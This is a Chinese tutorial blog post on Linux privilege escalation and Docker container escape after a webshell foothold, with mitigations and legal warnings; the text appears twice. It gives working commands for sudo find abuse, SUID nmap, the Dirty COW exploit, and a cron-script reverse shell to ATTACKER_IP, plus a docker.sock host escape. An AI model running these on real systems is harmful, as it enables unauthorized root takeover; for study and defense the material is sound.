导读拿到 Webshell 只是拿到了“访客权限”。在 Linux 系统中www-data或apache用户几乎什么都干不了——看不到关键信息改不了系统配置也没法横向移动。本期我们将学习如何把“访客”变成“主人”root这是渗透测试中最激动人心的时刻。一、 为什么要提权权限的边界1. 信息收集的需要普通用户只能看到自己的文件。Root 用户可以读取/etc/shadow密码哈希、全量日志、所有用户的操作记录。2. 横向移动的跳板很多内网穿透工具、扫描工具需要 Root 权限才能开启 raw socket 或进行 ARP 欺骗。3. 权限维持Root 权限意味着你可以修改内核模块、植入开机自启脚本即使系统重启也能连回来。二、 提权三板斧信息收集“打信息收集就是打一半的仗。” 拿到 Shell 后第一件事不是乱跑 Exp漏洞利用程序而是收集系统情报。1. 系统指纹# 查看内核版本最关键用来找对应 Exp uname -a # 查看发行版 cat /etc/*release实战意义如果内核是Ubuntu 16.04且内核版本较低大概率可以用Dirty COW 提权。2. 当前权限与环境# 我是谁 whoami # 我在哪 pwd # 有哪些 sudo 权限这是最轻松的提权方式 sudo -l3. 查找敏感文件# 查找带有 SUID 位的文件提权黄金点 find / -perm -4000 2/dev/null # 查找配置文件可能藏密码 find / -name config* -o -name *.conf 2/dev/null三、 实战演练四种经典提权手法1. Sudo 滥用最简单场景sudo -l显示(ALL) NOPASSWD: /usr/bin/find。利用sudo find /etc/passwd -exec /bin/sh \;原理find命令拥有 root 权限并且允许执行外部命令。2. SUID 提权最常见场景find / -perm -4000发现/usr/bin/nmap有 SUID 位。利用适用于旧版 Nmapnmap --interactive nmap !sh结果直接弹回一个 root shell。3. 内核漏洞提权核武器场景uname -a显示内核Linux 4.4.0-21-generic。操作在 Exploit-DB搜索对应版本的提权 Exp。下载40839.c。编译执行gcc 40839.c -o dirty ./dirty结果获得 root 权限。4. Cron Job计划任务提权场景发现/etc/crontab中有这么一行* * * * * root /home/user/clean.sh利用echo /bin/bash -c bash -i /dev/tcp/ATTACKER_IP/4444 01 /home/user/clean.sh chmod x /home/user/clean.sh原理等待一分钟系统以 root 身份执行clean.sh从而反弹 root shell 给攻击者。四、 2026 年新趋势容器逃逸Container Escape现在的 Web 服务大多跑在 Docker 容器里。即使你拿到了root也只是容器的“假 root”。1. 判断是否在容器内# 检查 /.dockerenv 文件 ls -la /.dockerenv # 查看进程数容器内通常很少 ps aux2. 逃逸手法Docker Socket 挂载场景容器内部存在/var/run/docker.sock。利用# 在容器内执行启动一个新容器并将宿主机根目录挂载进去 docker run -it --rm -v /:/host ubuntu chroot /host /bin/bash结果你现在已经是宿主机的 root 了。五、 防御视角如何修复及时打补丁内核漏洞只能通过升级内核修复。去除 SUID移除不必要程序的 SUID 位chmod u-s /usr/bin/find。配置 Sudoers禁止普通用户以 root 运行危险命令。容器安全绝对不要将/var/run/docker.sock挂载进容器。⚠️ 安全警示与法律红线 极度危险的警告严禁内核提权测试在真实业务服务器上运行内核 Exp如 Dirty COW极有可能导致系统崩溃Kernel Panic造成业务中断。严禁修改系统文件在未授权情况下严禁修改/etc/passwd、/etc/shadow或计划任务。靶场练习请在VulnHub (Lin.Security, Kioptrix) 或TryHackMe (Linux PrivEsc) 等合法靶场中练习。提权是系统层面的搏斗。一旦失误满盘皆输。请在隔离环境中磨练你的刀锋。 互动环节你在提权时遇到过最尴尬的事是什么比如 Exp 编译失败你觉得 SUID 提权和内核提权哪个更实用欢迎在评论区留言讨论 下一期预告【后渗透-Windows篇】Windows 域渗透 —— 从本地管理员到域控DC的跨越。
【后渗透-Linux篇】Linux 提权与逃逸:从 www-data到 root的蜕变
发布时间:2026/7/9 1:43:28
导读拿到 Webshell 只是拿到了“访客权限”。在 Linux 系统中www-data或apache用户几乎什么都干不了——看不到关键信息改不了系统配置也没法横向移动。本期我们将学习如何把“访客”变成“主人”root这是渗透测试中最激动人心的时刻。一、 为什么要提权权限的边界1. 信息收集的需要普通用户只能看到自己的文件。Root 用户可以读取/etc/shadow密码哈希、全量日志、所有用户的操作记录。2. 横向移动的跳板很多内网穿透工具、扫描工具需要 Root 权限才能开启 raw socket 或进行 ARP 欺骗。3. 权限维持Root 权限意味着你可以修改内核模块、植入开机自启脚本即使系统重启也能连回来。二、 提权三板斧信息收集“打信息收集就是打一半的仗。” 拿到 Shell 后第一件事不是乱跑 Exp漏洞利用程序而是收集系统情报。1. 系统指纹# 查看内核版本最关键用来找对应 Exp uname -a # 查看发行版 cat /etc/*release实战意义如果内核是Ubuntu 16.04且内核版本较低大概率可以用Dirty COW 提权。2. 当前权限与环境# 我是谁 whoami # 我在哪 pwd # 有哪些 sudo 权限这是最轻松的提权方式 sudo -l3. 查找敏感文件# 查找带有 SUID 位的文件提权黄金点 find / -perm -4000 2/dev/null # 查找配置文件可能藏密码 find / -name config* -o -name *.conf 2/dev/null三、 实战演练四种经典提权手法1. Sudo 滥用最简单场景sudo -l显示(ALL) NOPASSWD: /usr/bin/find。利用sudo find /etc/passwd -exec /bin/sh \;原理find命令拥有 root 权限并且允许执行外部命令。2. SUID 提权最常见场景find / -perm -4000发现/usr/bin/nmap有 SUID 位。利用适用于旧版 Nmapnmap --interactive nmap !sh结果直接弹回一个 root shell。3. 内核漏洞提权核武器场景uname -a显示内核Linux 4.4.0-21-generic。操作在 Exploit-DB搜索对应版本的提权 Exp。下载40839.c。编译执行gcc 40839.c -o dirty ./dirty结果获得 root 权限。4. Cron Job计划任务提权场景发现/etc/crontab中有这么一行* * * * * root /home/user/clean.sh利用echo /bin/bash -c bash -i /dev/tcp/ATTACKER_IP/4444 01 /home/user/clean.sh chmod x /home/user/clean.sh原理等待一分钟系统以 root 身份执行clean.sh从而反弹 root shell 给攻击者。四、 2026 年新趋势容器逃逸Container Escape现在的 Web 服务大多跑在 Docker 容器里。即使你拿到了root也只是容器的“假 root”。1. 判断是否在容器内# 检查 /.dockerenv 文件 ls -la /.dockerenv # 查看进程数容器内通常很少 ps aux2. 逃逸手法Docker Socket 挂载场景容器内部存在/var/run/docker.sock。利用# 在容器内执行启动一个新容器并将宿主机根目录挂载进去 docker run -it --rm -v /:/host ubuntu chroot /host /bin/bash结果你现在已经是宿主机的 root 了。五、 防御视角如何修复及时打补丁内核漏洞只能通过升级内核修复。去除 SUID移除不必要程序的 SUID 位chmod u-s /usr/bin/find。配置 Sudoers禁止普通用户以 root 运行危险命令。容器安全绝对不要将/var/run/docker.sock挂载进容器。⚠️ 安全警示与法律红线 极度危险的警告严禁内核提权测试在真实业务服务器上运行内核 Exp如 Dirty COW极有可能导致系统崩溃Kernel Panic造成业务中断。严禁修改系统文件在未授权情况下严禁修改/etc/passwd、/etc/shadow或计划任务。靶场练习请在VulnHub (Lin.Security, Kioptrix) 或TryHackMe (Linux PrivEsc) 等合法靶场中练习。提权是系统层面的搏斗。一旦失误满盘皆输。请在隔离环境中磨练你的刀锋。 互动环节你在提权时遇到过最尴尬的事是什么比如 Exp 编译失败你觉得 SUID 提权和内核提权哪个更实用欢迎在评论区留言讨论 下一期预告【后渗透-Windows篇】Windows 域渗透 —— 从本地管理员到域控DC的跨越。